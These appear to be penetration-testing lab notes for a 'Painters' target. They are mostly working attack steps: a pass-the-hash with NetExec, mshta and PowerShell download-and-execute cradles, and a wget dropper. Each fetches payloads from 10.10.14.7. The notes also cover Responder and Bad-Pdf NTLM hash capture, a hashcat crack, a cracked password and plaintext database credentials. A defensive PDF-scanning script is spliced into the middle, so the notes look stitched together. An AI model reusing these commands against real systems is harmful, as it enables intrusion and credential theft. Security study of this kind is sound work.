External Recon

nmap Results

On the vacancies tab, we found some job postings.

  • User Ralph Davies vacancies

Resource Development

1. With NetExec (nxc, the successor of CrackMapExec/CME)

nxc smb <TargetIP> -u 'Administrator' -H <NTLM Hash> --local-auth -x "C:\\Windows\\System32\\mshta.exe http://10.10.14.7/sharp_new.hta"

2. Using mshta

mshta.exe http://10.10.14.7/sharp_new.hta

3. Using PowerShell (various encodings/escaping)

powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.7/sharp.ps1')"
(New-Object System.Net.WebClient).DownloadString('http://10.10.14.7/sharp.ps1') | IEX
powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.10.14.7/sharp.ps1%27)%22

4. Linux Dropper (Wget Method)

wget http://10.10.14.7/bad.sh -O /tmp/bad.sh && sh /tmp/bad.sh

xor_shellcode

PDF upload

The site has a PDF upload feature that lets a user apply for the job vacancies. The default credentials admin:admin do not work on /views/admin.

Responder and badpdf

sudo su
cd /opt/active_directory/Responder
source venv-responder/bin/activate
sudo systemctl stop smbd
sudo systemctl disable smbd
./Responder.py -I tun0

badpdf

git clone https://github.com/deepzec/Bad-Pdf.git

sudo python2 badpdf.py

  • I have changed the exploit so that it doesn't check or run Responder. We have to start it manually.

Getting the NTLM Hash
[SMB] NTLMv2-SSP Client   : 10.10.110.35
[SMB] NTLMv2-SSP Username : PAINTERS\riley
[SMB] NTLMv2-SSP Hash     : riley::PAINTERS:9a3135c3984284ec…
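As the defensive counterpart to the Bad-PDF step above, an added example (not part of these notes or of the Bad-Pdf project) of the check the vacancies upload handler could run on a submitted PDF: it flags UNC paths and file:// URIs, the references that make a reader reach out to a share when the document is opened. The two sample PDFs and the host 203.0.113.10 are constructed.

```python
import re
from typing import List, Tuple

# A UNC reference inside a PDF literal string reads \\host\share\...; the file
# may also carry doubled backslashes (PDF string escaping), so accept two or more.
# The trailing [^\s()<>]* swallows the rest of the path so that \share is not
# reported as a second host.
UNC_RE = re.compile(rb"\\\\+([A-Za-z0-9][A-Za-z0-9.\-]*)\\[^\s()<>]*")
# file:// URIs are resolved over SMB by some Windows readers as well.
FILE_URI_RE = re.compile(rb"file:/{2,}([A-Za-z0-9][A-Za-z0-9.\-]*)", re.IGNORECASE)


def find_remote_references(pdf_bytes: bytes) -> List[Tuple[str, str]]:
    """Return (kind, host) for every UNC path or file:// URI visible in the raw bytes."""
    hits = [("unc", m.group(1).decode("ascii", "replace")) for m in UNC_RE.finditer(pdf_bytes)]
    hits += [("file-uri", m.group(1).decode("ascii", "replace")) for m in FILE_URI_RE.finditer(pdf_bytes)]
    return hits


def upload_verdict(pdf_bytes: bytes) -> str:
    """'reject', 'accept', or 'deep-scan' when compressed object streams (/ObjStm)
    could hide the keys from a plain byte scan; hand those to a real PDF parser."""
    if not pdf_bytes.startswith(b"%PDF-"):
        return "reject"
    if find_remote_references(pdf_bytes):
        return "reject"
    if b"/ObjStm" in pdf_bytes:
        return "deep-scan"
    return "accept"


# Constructed samples (not real exploit files): the first carries a file
# specification that points at a UNC share, the second is an ordinary document.
SUSPICIOUS_PDF = rb"""%PDF-1.7
3 0 obj << /Type /Filespec /F (\\\\203.0.113.10\\share\\cv.pdf) >> endobj
%%EOF
"""
BENIGN_PDF = rb"""%PDF-1.7
3 0 obj << /Type /Filespec /F (cv.pdf) >> endobj
%%EOF
"""

if __name__ == "__main__":
    for name, blob in (("suspicious", SUSPICIOUS_PDF), ("benign", BENIGN_PDF)):
        print(name, upload_verdict(blob), find_remote_references(blob))
```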
Cracking the Hash (NetNTLMv2, hashcat mode 5600)

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Password for user riley (cracked from the riley hash): P@ssw0rd

Initial Foothold

Log in over SSH as user riley

ssh riley@10.10.110.35

Enumeration

Database credentials from the web application's PHP config:

define("DB_HOST", "localhost");
define("DB_NAME", "painter");
define("DB_CHARSET", "utf8");
define("DB_USER", "riley");
define("DB_PASSWORD", "PainterDBPassword2022");

[+] Users with console

blake:x:1002:1002:Blake Morris,,,:/home/blake:/bin/bash
daniel:x:1001:1001:Daniel Morris,,,:/home/daniel:/bin/bash
matt:x:1000:1000:Matt Fisher:/home/matt:/bin/bash
riley:x:1003:1003:Riley Smart,,,:/home/riley:/bin/bash
root:x:0:0:root:/root:/bin/bash